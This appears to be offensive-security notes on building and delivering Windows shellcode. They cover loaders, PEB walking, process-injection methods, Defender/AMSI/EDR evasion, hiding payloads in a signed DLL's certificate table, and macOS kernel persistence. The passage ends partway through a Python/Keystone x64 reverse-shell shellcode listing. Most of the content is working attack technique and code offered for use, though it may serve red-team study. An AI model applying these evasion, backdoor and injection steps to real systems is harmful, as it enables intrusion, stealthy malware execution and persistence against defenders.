Shellcode Development Workflow
- Define concept and target platform (x86/x64, Windows/Linux/macOS)
- Write assembly using position-independent techniques
- Extract binary and test in controlled environment
- Apply null byte avoidance and optimizations
- Encode/encrypt to evade static detection
- Package with loader and choose delivery method
Basic Concepts
Execution Pattern (Allocate-Write-Execute)
Avoid direct PAGE_EXECUTE_READWRITE — prefer:
- Allocate with
PAGE_READWRITE - Write shellcode to allocated region
- Call
VirtualProtectto switch toPAGE_EXECUTE_READ
char *dest = VirtualAlloc(NULL, 0x1234, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE);
memcpy(dest, shellcode, 0x1234);
VirtualProtect(dest, 0x1234, PAGE_EXECUTE_READ, &old);
((void(*)())dest)();
Position-Independent Code (PIC) Techniques
| Method | Platform | Notes |
|---|---|---|
| Call/Pop | Windows | Push next addr, pop into register |
| FPU state | Windows | fstenv saves instruction pointer |
| SEH | Windows | Exception handler stores EIP |
| GOT | Linux | Global Offset Table |
| VDSO | Linux | Kernel-provided shared object |
Windows API Resolution (PEB Walk)
Identifying kernel32.dll without imports:
- Get
PEBviags:[0x60](x64) orfs:[0x30](x86) - Walk
PEB->Ldr.InMemoryOrderModuleList— order: exe → ntdll → kernel32 - Hash-compare module names to locate
kernel32 - Parse the Export Address Table (EAT)
- Find
GetProcAddressby name hash, then resolveLoadLibraryA - Use
LoadLibraryAto loadWS2_32.dll, resolve Winsock functions
WinDbg helpers for debugging PEB walk:
dt nt!_TEB -y ProcessEnvironmentBlock @$teb
dt nt!_PEB -y Ldr <peb_addr>
dt -r _PEB_LDR_DATA <ldr_addr>
dt _LDR_DATA_TABLE_ENTRY (<init_flink_addr> - 0x10)
lm m kernel32 # verify base address
r @r8 # check register
Shellcode Loaders
Loader Responsibilities
- Environment verification / keying (sandbox detection)
- Shellcode decryption
- Safe memory allocation and injection
- Ends its duties after injecting
Recommended languages: Zig (small, no runtime), Rust (secure), Nim, Go (watch for runtime signatures)
Allocation Phase
Avoid RWX allocations — use two-step:
VirtualAllocEx/NtAllocateVirtualMemory— allocateRWZwCreateSection+NtMapViewOfSection— alternative approach- After writing:
VirtualProtectExto switch toRX
Other options: code caves, stack/heap (with DEP disabled)
Write Phase
WriteProcessMemory/NtWriteVirtualMemorymemcpyto mapped section
Evasion tips:
- Prepend shellcode with dummy opcodes
- Split into chunks, write in randomized order
- Add delays between writes
Execute Phase
Most scrutinized step — EDR checks thread start address against image-backed memory:
| Technique | Notes |
|---|---|
CreateRemoteThread / ZwCreateThreadEx | Loud, heavily monitored |
NtSetContextThread | Hijack suspended thread |
NtQueueApcThreadEx | APC injection |
| API trampolines | Overwrite function prologue |
| ThreadlessInject | No new threads created |
Indirect execution resources:
PE-to-Shellcode Conversion
| Tool | Purpose |
|---|---|
| Donut | EXE/DLL → shellcode |
| sRDI | DLL → position-independent shellcode |
| Pe2shc | PE → shellcode |
| Amber | Reflective PE packer |
Open-source loaders:
- ScareCrow
- NimPackt-v1
- NullGate — indirect syscalls + junk-write sequencing
- DripLoader — chunked RW writes + direct syscalls + JMP trampoline
- ProtectMyTooling — chain multiple protections
- Direct-syscall helpers: SysWhispers3, FreshyCalls (now baseline requirements)
Shellcode Storage & Hiding
| Location | Risk | Notes |
|---|---|---|
Hardcoded in .text | Medium | Requires recompile; stored RW/RO |
PE Resources (RCDATA) | High | Most scanned by AV |
| Extra PE section | Medium | Use second-to-last section |
| Certificate Table | Low | Keeps signed PE signature intact |
| Internet-hosted | Variable | SharpShooter |
Certificate Table technique (recommended):
- Pad Certificate Table with shellcode bytes; update PE headers
- Backdoor only the loader DLL (e.g.,
ffmpeg.dllinteams.exe) - Main executable signature remains valid; only the DLL signature breaks
Protection: Compress with LZMA; encrypt with XOR32, RC4, or AES before storing.
Windows 11 24H2 note: AMSI heap scanning is active. Allocate with
PAGE_NOACCESS, decrypt in place, then switch toPAGE_EXECUTE_READto avoid live-heap scans.
Evasion
Progressive Evasion Escalation
- Basic shellcode execution (baseline)
- Add XOR/AES encryption + obfuscation
- Direct syscalls to bypass userland hooks
- Remote process injection as last resort
Local vs Remote Injection
Remote injection is more detectable:
CFG/CIGenforcement- ETW Ti feeds
- EDR call-stack back-tracing (
NtOpenProcessinvocation source) - More scrutinized steps: OpenProcess → Allocate → Write → Execute
Defender bypass tools (DefenderBypass):
myEncoder3.py— XOR-encrypt binary shellcodeInjectBasic.cpp— basic C++ injectorInjectCryptXOR.cpp— XOR decrypt + injectInjectSyscall-LocalProcess.cpp— direct syscalls, no suspicious IAT entriesInjectSyscall-RemoteProcess.cpp— remote process injection via direct syscalls
Cross-Platform Considerations
Windows on ARM64 (WoA)
- Syscalls use
SVC 0with ARM64 table inntdll!KiServiceTableArm64 - Pointer Authentication (PAC) signs LR — avoid stack pivots or re-sign with
PACIASP
Linux 6.9+ (eBPF Arena)
BPF_MAP_TYPE_ARENAmaps can hold executable memory- Hide shellcode chunks in arena map, execute via
bpf_prog_run_pin_on_cpu
macOS (Signed System Volume)
- macOS 12+ seals the system partition; unsigned payloads cannot reside there
- Userspace: launch agents, dylib hijacks in
/Library/Apple/System/Library/Dyld/ - Kernel persistence: create sealed snapshot, mount RW, inject, resign with
kmutil, bless
DripLoader Technique
github.com/xuanxuan0/DripLoader:
- Reserve 64KB chunks with
NO_ACCESS - Allocate 4KB
RWchunks within that pool - Write shellcode in chunks in randomized order
- Re-protect to
RX - Overwrite prologue of
ntdll!RtlpWow64CtxFromAmd64with JMP trampoline - All calls via direct syscalls:
NtAllocateVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx
Full x64 Reverse Shell Shellcode (Windows)
Complete Python/Keystone example implementing PEB walk → GetProcAddress → LoadLibraryA → Winsock connect → CreateProcessA(cmd.exe):
import ctypes, struct
from keystone import *
CODE = (
# Locate kernel32 Base Address
" start: "
" add rsp, 0xfffffffffffffdf8 ;" # Avoid Null Byte and make some space
" find_kernel32: "
" int3 ;" # WinDbg breakpoint (disable for release)
" xor rcx, rcx ;"
" mov rax, gs:[rcx + 0x60] ;" # RAX = PEB
" mov rax, [rax + 0x18] ;" # RAX = PEB->Ldr
" mov rsi, [rax + 0x20] ;" # RSI = InMemoryOrderModuleList
" lodsq ;"